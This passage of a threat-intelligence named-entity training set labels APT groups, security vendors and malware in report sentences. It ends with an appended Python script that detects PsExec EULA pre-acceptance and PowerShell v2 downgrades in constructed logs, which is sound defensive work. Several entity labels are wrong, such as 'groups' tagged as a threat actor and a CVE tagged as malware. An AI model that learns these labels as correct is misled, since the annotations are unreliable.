79]]}, "info": {"id": "dnrti_train_003607", "source": "dnrti_train"}} {"text": "Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices .", "spans": {"THREAT_ACTOR: groups": [[16, 22]], "ORGANIZATION: Kaspersky": [[25, 34]], "THREAT_ACTOR: ZooPark": [[70, 77]]}, "info": {"id": "dnrti_train_003609", "source": "dnrti_train"}} {"text": "Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT33": [[69, 74]]}, "info": {"id": "dnrti_train_003610", 
"source": "dnrti_train"}} {"text": "In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor .", "spans": {"ORGANIZATION: Kaspersky": [[23, 32]], "THREAT_ACTOR: ScarCruft": [[42, 51]], "TOOL: ROKRAT": [[153, 159]]}, "info": {"id": "dnrti_train_003612", "source": "dnrti_train"}} {"text": "The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication .", "spans": {"THREAT_ACTOR: actor": [[11, 16]], "ORGANIZATION: Kaspersky": [[45, 54]], "ORGANIZATION: PLATINUM": [[74, 82]]}, "info": {"id": "dnrti_train_003614", "source": "dnrti_train"}} {"text": "FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "ORGANIZATION: APT40": [[16, 21]], "THREAT_ACTOR: TEMP.Periscope": [[89, 103]], "THREAT_ACTOR: Leviathan": [[106, 115]], "THREAT_ACTOR: TEMP.Jumper": [[120, 131]]}, "info": {"id": "dnrti_train_003615", "source": "dnrti_train"}} {"text": "In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "THREAT_ACTOR: PROJECTM": [[86, 94]], "THREAT_ACTOR: MYTHIC LEOPARD": [[99, 113]]}, "info": {"id": "dnrti_train_003616", "source": "dnrti_train"}} {"text": "OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]], "TOOL: KerrDown": [[87, 95]], "ORGANIZATION: Palo Alto": [[113, 122]]}, "info": {"id": "dnrti_train_003617", "source": "dnrti_train"}} {"text": "ESET 
recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: OceanLotus’s": [[42, 54]]}, "info": {"id": "dnrti_train_003618", "source": "dnrti_train"}} {"text": "In mid-2018 , Kaspersky's report on “Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges .", "spans": {"ORGANIZATION: Kaspersky's": [[14, 25]], "THREAT_ACTOR: Lazarus": [[87, 94]]}, "info": {"id": "dnrti_train_003619", "source": "dnrti_train"}} {"text": "Kaspersky also observed some activity from Gaza Team and MuddyWater .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: MuddyWater": [[57, 67]]}, "info": {"id": "dnrti_train_003620", "source": "dnrti_train"}} {"text": "Kaspersky wrote about LuckyMouse targeting national data centers in June .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: LuckyMouse": [[22, 32]]}, "info": {"id": "dnrti_train_003621", "source": "dnrti_train"}} {"text": "Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: LuckyMouse": [[31, 41]]}, "info": {"id": "dnrti_train_003622", "source": "dnrti_train"}} {"text": "Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Oilrig": [[73, 79]], "THREAT_ACTOR: Stonedrill": [[84, 94]]}, "info": {"id": "dnrti_train_003623", "source": "dnrti_train"}} {"text": "In August 2019 , FireEye released the “Double Dragon” report on our newest graduated threat group , APT41 .", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "THREAT_ACTOR: APT41": [[100, 105]]}, "info": {"id": 
"dnrti_train_003624", "source": "dnrti_train"}} {"text": "Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations .", "spans": {"ORGANIZATION: FireEye": [[8, 15]], "THREAT_ACTOR: APT41": [[75, 80]]}, "info": {"id": "dnrti_train_003625", "source": "dnrti_train"}} {"text": "Group-IB experts continuously monitor the Silence’ activities .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: Silence’": [[42, 50]]}, "info": {"id": "dnrti_train_003626", "source": "dnrti_train"}} {"text": "Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: MoneyTaker": [[40, 50]]}, "info": {"id": "dnrti_train_003627", "source": "dnrti_train"}} {"text": "Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: Lazarus": [[92, 99]]}, "info": {"id": "dnrti_train_003628", "source": "dnrti_train"}} {"text": "Finally , Kaspersky produced a summary report on Sofacy’s summertime activity .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Sofacy’s": [[49, 57]]}, "info": {"id": "dnrti_train_003629", "source": "dnrti_train"}} {"text": "Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Scarcruft": [[99, 108]], "THREAT_ACTOR: Bluenoroff": [[113, 123]]}, "info": {"id": "dnrti_train_003630", "source": "dnrti_train"}} {"text": "Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis .", "spans": {"ORGANIZATION: Kaspersky": [[79, 88]], "THREAT_ACTOR: BlackOasis": [[98, 108]]}, "info": {"id": "dnrti_train_003631", 
"source": "dnrti_train"}} {"text": "For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 .", "spans": {"THREAT_ACTOR: Bisonal malware": [[14, 29]], "MALWARE: Bisonal": [[98, 105]]}, "info": {"id": "dnrti_train_003835", "source": "dnrti_train"}} {"text": "We can observe that the sample is very recent , created on Thursday , July 4", "spans": {"MALWARE: sample": [[24, 30]]}, "info": {"id": "dnrti_train_003850", "source": "dnrti_train"}} {"text": "Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": {"MALWARE: EternalRomance": [[25, 39]], "MALWARE: EternalSynergy": [[53, 67]], "MALWARE: CVE-2017-0143": [[86, 99]]}, "info": {"id": "dnrti_train_003868", "source": "dnrti_train"}} {"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]], "THREAT_ACTOR: Maudi": [[145, 150]]}, "info": {"id": "dnrti_train_004230", "source": "dnrti_train"}}
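Two of the Waterbug records above describe host-level tradecraft that translates directly into detections: reconfiguring the Sysinternals registry so PsExec runs without its pop-up, and running an older PowerShell version to avoid logging. The block below is an added example, not code from this dataset or from any of the vendors quoted in it. It runs over constructed, simplified log records in the shape of Sysmon event 1 (process creation), Sysmon event 13 (registry value set) and PowerShell event 400 (engine started). The registry path `Software\Sysinternals\<Tool>\EulaAccepted` is the real value PsExec checks, and `EngineVersion`/`HostVersion` are real fields of event 400; the SIDs, file paths and command lines are invented for the example.

```python
"""Host-log detections for two Waterbug habits recorded above: pre-accepting the
Sysinternals EULA so PsExec runs without a pop-up, and starting an old (v2)
PowerShell engine to sidestep the logging newer engines provide.

Added example; the log records are constructed and simplified (Sysmon event 1 =
process creation, Sysmon event 13 = registry value set, PowerShell event 400 =
engine started). Only the field names and the EulaAccepted registry path are
real; SIDs, paths and command lines are invented.
"""
import re
from typing import Dict, Iterable, List

SAMPLE_EVENTS: List[Dict] = [
    # Constructed: reg.exe writes EulaAccepted=1 under the Sysinternals key so the
    # next PsExec run shows no licence dialog (the behaviour attributed to Waterbug).
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Sysinternals\PsExec\EulaAccepted",
     "Details": "DWORD (0x00000001)"},
    # Constructed: explicit downgrade to the v2 engine on the command line.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Version 2 -NoProfile -ExecutionPolicy Bypass -File C:\Users\Public\up.ps1"},
    # Constructed: the matching engine-lifecycle event; the host is 5.1 but the engine is 2.0.
    {"EventID": 400, "EngineVersion": "2.0", "HostVersion": "5.1.17763.1"},
    # Constructed benign noise that must not fire.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 400, "EngineVersion": "5.1.17763.1", "HostVersion": "5.1.17763.1"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\agent.exe",
     "TargetObject": r"HKLM\SOFTWARE\Vendor\Agent\LastRun", "Details": "DWORD (0x5D1D2B7C)"},
]

# PsExec (and the other Sysinternals tools) look for HK??\Software\Sysinternals\<Tool>\EulaAccepted.
EULA_KEY_RE = re.compile(r"\\Software\\Sysinternals\\[^\\]+\\EulaAccepted$", re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of -Version, so match -v through -version.
PS_V2_ARG_RE = re.compile(r"(?<!\S)-v(?:ersion|ersio|ersi|ers|er|e)?\s+2(?:\.0)?(?!\S)", re.IGNORECASE)


def major(version: str) -> int:
    """Leading component of a dotted version string; 0 if it cannot be parsed."""
    head = version.split(".", 1)[0]
    return int(head) if head.isdigit() else 0


def is_engine_downgrade(engine_version: str, host_version: str) -> bool:
    """Event 400 records the engine that actually started. A 2.x engine inside a
    5.x host means the session was deliberately downgraded."""
    return 0 < major(engine_version) < major(host_version)


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding per matching event, in input order."""
    findings: List[Dict] = []
    for e in events:
        eid = e.get("EventID")
        if eid == 13 and EULA_KEY_RE.search(e.get("TargetObject", "")):
            findings.append({"rule": "sysinternals_eula_preaccepted",
                             "writer": e.get("Image", ""), "key": e["TargetObject"],
                             "value": e.get("Details", "")})
        elif eid == 1 and PS_V2_ARG_RE.search(e.get("CommandLine", "")):
            findings.append({"rule": "powershell_v2_requested",
                             "command_line": e["CommandLine"]})
        elif eid == 400 and is_engine_downgrade(e.get("EngineVersion", ""), e.get("HostVersion", "")):
            findings.append({"rule": "powershell_engine_downgrade",
                             "engine": e["EngineVersion"], "host": e["HostVersion"]})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Two caveats for anyone turning this into a production rule. EulaAccepted is also written by any administrator who has run a Sysinternals tool with `-accepteula`, so treat the registry hit as a hunting lead and correlate it with the writing process (reg.exe or a script rather than the tool itself) and with PsExec being new to the host. The engine-downgrade check only fires while the Windows PowerShell 2.0 engine is still installed; removing that optional feature closes the downgrade path, which is the preventive control behind the detection.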